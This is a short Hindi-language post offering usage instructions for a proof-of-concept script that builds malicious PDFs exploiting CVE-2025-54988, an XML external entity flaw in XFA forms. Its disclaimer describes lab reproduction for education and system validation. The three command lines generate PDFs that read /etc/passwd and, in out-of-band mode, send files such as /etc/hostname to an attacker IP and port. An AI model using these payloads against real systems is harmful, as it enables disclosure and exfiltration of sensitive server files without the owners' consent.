
CVE-2025-54988 के लिए एक PDF जनरेटर
अस्वीकरण: मैं इस कमजोरी का मूल खोजकर्ता नहीं हूं। यह पोस्ट एक नियंत्रित वातावरण में शैक्षिक उद्देश्यों के लिए और दूसरों को अपने सिस्टम को मान्य करने में मदद करने के लिए समस्या को पुन: प्रस्तुत करने की मेरी प्रक्रिया का दस्तावेजीकरण करती है। परीक्षण एक पृथक प्रयोगशाला में किए गए थे जिसका उत्पादन प्रणालियों पर कोई प्रभाव नहीं पड़ा।
उपयोग:
python3 xfa_xxe_poc_gen.py --mode file --file /etc/passwd -o xfa_passwd.pdf
python3 xfa_xxe_poc_gen.py --mode oob --ip 127.0.0.1 --port 8888 --write-dtd -o xfa_oob.pdf
python3 xfa_xxe_poc_gen.py --mode oob --ip 10.10.14.3 --port 8080 --oob-file /etc/hostname --param d
